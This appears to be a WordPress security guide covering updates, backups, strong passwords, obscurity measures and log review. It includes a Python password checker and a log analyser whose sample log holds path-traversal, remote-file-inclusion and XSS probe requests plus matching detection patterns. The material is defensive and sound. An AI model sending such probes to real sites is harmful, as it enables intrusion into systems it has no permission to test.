How to secure your WordPress website
The security of your WordPress website is something you should always keep in mind, because, as with other open source software, security vulnerabilities can arise if you do not take the necessary precautions. Below we look at the most common types of vulnerabilities and what you can do to have the safest WordPress installation possible.
What is security?
Securing an application means reducing risk, not eliminating it. The actions below improve the overall security posture of your website and, as a result, reduce the chance of it being targeted, and perhaps compromised, by malicious users.
Your hosting server plays an important role in the security of your website. The server administrator should monitor the availability of resources and the privacy and integrity of the server, ensure that it runs the latest stable versions of its software, and have reliable methods for backing up its files.
Hosting providers are responsible for the server where your website is hosted, but not for the website itself. The role of a website's technical manager is different from that of the server administrator. In the absence of a developer, the technical manager's duties fall to whoever built the site and manages, updates and upgrades it, so each of us who runs even a simple website is a potential or active technical manager.
Updating and upgrading a website is very important. Some of the practices you should follow as the technical manager of your website are:
- Keep your website's management environment (the CMS itself) at the latest available version.
- Maintain backups of your installation regularly, so that recovery of your system in an emergency is feasible.
- Avoid installing plugins or themes from untrusted sources; they can lead to problems. A reliable source is the WordPress repository.
Ensure that the computers you use are free of spyware and viruses. Keep your operating system and software, especially your web browser, updated, and if possible avoid browsing websites that are considered untrusted.
WordPress, as software, is regularly updated to address security flaws as they are discovered. For this reason, keep it updated to the latest version and avoid staying on an older one.
The latest version of WordPress is always available from its official website, and it is recommended not to download or install it from anywhere else. To help you, WordPress supports an automatic update option that you can use.
Many potential vulnerabilities can be avoided if you have a strong password.
When choosing a password it is advisable to keep in mind:
- Do not use your real name, username, company name or your website's name.
- Do not use words from the dictionary of any language.
- The password should not be too short.
- Your password should contain numbers, letters and symbols.
It is also a good idea to turn on two-factor authentication as an additional safety measure.
Make sure your plugins are updated to the latest version. If you are not using some of them, it is better to delete them from your system.
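The password rules listed above can be enforced at registration or password-change time rather than left to the user's memory. The following checker is an added example written for this article, not code from WordPress itself; the small word list is a constructed stand-in for a real dictionary file, and the `personal_terms` argument is assumed to be filled in by the caller with the user's real name, username, company name and site name.

```python
import string

# Constructed stand-in for a real wordlist (assumption: in practice, load a
# full dictionary file for every language your users are likely to use).
COMMON_WORDS = {"password", "welcome", "dragon", "summer",
                "football", "letmein", "qwerty", "monkey"}

# Digit/symbol substitutions that do not make a dictionary word any stronger;
# the password is normalised through this table before the word checks.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "@": "a", "$": "s", "!": "i"})

MIN_LENGTH = 12


def check_password(password, personal_terms=(), wordlist=COMMON_WORDS,
                   min_length=MIN_LENGTH):
    """Return the list of policy violations; an empty list means it passes.

    personal_terms: names the password must not contain (real name, username,
    company name, site name), as the article recommends.
    """
    problems = []
    lowered = password.lower()
    normalized = lowered.translate(LEET)

    # Rule 1: no real name, username, company name or website name.
    for term in personal_terms:
        t = term.lower()
        if len(t) >= 3 and (t in lowered or t in normalized):
            problems.append(f"contains personal term '{term}'")

    # Rule 2: no dictionary words, even with common substitutions applied.
    for word in sorted(wordlist):
        if len(word) >= 4 and (word in lowered or word in normalized):
            problems.append(f"contains dictionary word '{word}'")

    # Rule 3: not too short.
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")

    # Rule 4: numbers, letters and symbols must all be present.
    classes = {
        "digits": any(c.isdigit() for c in password),
        "letters": any(c.isalpha() for c in password),
        "symbols": any(c in string.punctuation for c in password),
    }
    missing = [name for name, present in classes.items() if not present]
    if missing:
        problems.append("missing " + ", ".join(missing))
    return problems


def is_acceptable(password, personal_terms=()):
    """True when the password violates none of the rules above."""
    return not check_password(password, personal_terms)


if __name__ == "__main__":
    site_terms = ["admin", "Acme Corp", "acme-blog"]
    for candidate in ["admin2024!", "P@ssw0rd1234", "xK9#vT2$mQ7!bR4"]:
        print(candidate, "->", check_password(candidate, site_terms) or "ok")
```

The leet-speak normalisation is the part worth keeping: a rule that only looks for the literal word "password" is satisfied by "P@ssw0rd1234", which is exactly the kind of password a wordlist-based guess will still find.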
Security through obscurity
Hiding information in WordPress is another form of protection that can help your website's security. Two easy ways to do this are:
- Renaming your administrator account: When creating your administrator account try to avoid easy usernames like admin, administrator or webmaster.
- Changing your table prefix: Many automated SQL injection attacks assume that the default table prefix in your database is wp_. Changing the prefix to something different can block at least some of these attacks.
Another form of protection is frequent backups of your website's files and MySQL databases, kept in a trusted location.
A log file helps you see what happened on your website, from where and when. It also lets you determine the IP address and the actions taken by an attacker, even though it does not tell you which username logged in.
Through log files you can see attacks such as Cross Site Scripting (XSS), Remote File Inclusion (RFI), Local File Inclusion (LFI) and brute force attacks. You can also see when the theme and plugin editors were used, when someone updated your widgets, and when new pages and posts were added. An attack almost always leaves traces, either in logs or in system files (new files, modified files, etc.).
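To show what "seeing attacks in the logs" looks like in practice, here is an added example, written for this article and not part of WordPress or any web server, that runs over a constructed sample of web-server access-log lines in the common "combined" format. It flags the request types the article names (XSS, RFI and LFI probes, and repeated login attempts from one address) and records use of the theme editor and post editor. The IP addresses, timestamps and the five-attempt brute-force threshold are all constructed or assumed values.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample of "combined" access-log lines (not real traffic).
# Note the third field is the HTTP auth user, normally "-": as the article
# says, the web-server log does not tell you which WordPress user logged in.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /wp-login.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "POST /wp-login.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:14:01:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.23 - - [10/Oct/2023:14:01:05 +0000] "GET /index.php?inc=http://203.0.113.9/remote.txt HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.23 - - [10/Oct/2023:14:01:09 +0000] "GET /?s=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 8012 "-" "curl/7.68.0"
192.0.2.5 - - [10/Oct/2023:14:10:00 +0000] "GET /wp-admin/theme-editor.php?file=functions.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:14:12:30 +0000] "POST /wp-admin/post-new.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:14:15:00 +0000] "GET /about/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# One "combined" log line: client IP, identity, auth user, [time], "METHOD PATH PROTO", status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Coarse request-content signatures, applied to the URL-decoded path and
# query string. These are heuristics for triage, not proof of compromise.
PATTERNS = {
    "LFI": re.compile(r"\.\./|/etc/passwd|php://", re.I),
    "RFI": re.compile(r"[?&][^=]+=(https?|ftp)://", re.I),
    "XSS": re.compile(r"<script|javascript:|on(load|error|click|mouseover)\s*=", re.I),
}

# Admin pages whose use the article says you should be able to see in the logs.
ADMIN_PAGES = {
    "/wp-admin/theme-editor.php": "theme editor",
    "/wp-admin/plugin-editor.php": "plugin editor",
    "/wp-admin/widgets.php": "widgets",
    "/wp-admin/post-new.php": "new post/page",
    "/wp-admin/post.php": "post/page edit",
}


def parse(log_text):
    """Yield one dict per parseable log line; unparseable lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_payloads(entries):
    """Requests whose decoded URL matches an LFI/RFI/XSS signature."""
    hits = []
    for e in entries:
        decoded = unquote_plus(e["path"])  # %3Cscript%3E -> <script>
        for kind, rx in PATTERNS.items():
            if rx.search(decoded):
                hits.append((kind, e["ip"], decoded))
    return hits


def find_brute_force(entries, threshold=5):
    """IPs that POSTed to wp-login.php at least `threshold` times (assumed limit)."""
    attempts = Counter(
        e["ip"] for e in entries
        if e["method"] == "POST" and e["path"].startswith("/wp-login.php")
    )
    return {ip: n for ip, n in attempts.items() if n >= threshold}


def find_admin_activity(entries):
    """Timeline of editor/widget/post activity, to compare against what you did yourself."""
    events = []
    for e in entries:
        base = e["path"].split("?", 1)[0]
        if base in ADMIN_PAGES:
            events.append((e["time"], e["ip"], ADMIN_PAGES[base]))
    return events


def analyse(log_text):
    entries = list(parse(log_text))
    return {
        "payloads": find_payloads(entries),
        "brute_force": find_brute_force(entries),
        "admin": find_admin_activity(entries),
    }


if __name__ == "__main__":
    for section, findings in analyse(SAMPLE_LOG).items():
        print(section, findings)
```

The admin-activity timeline is the part to act on day to day: if the theme editor was used at 14:10 and nobody on your team did that, the attacker has already traced a path for you to follow in the file modification times.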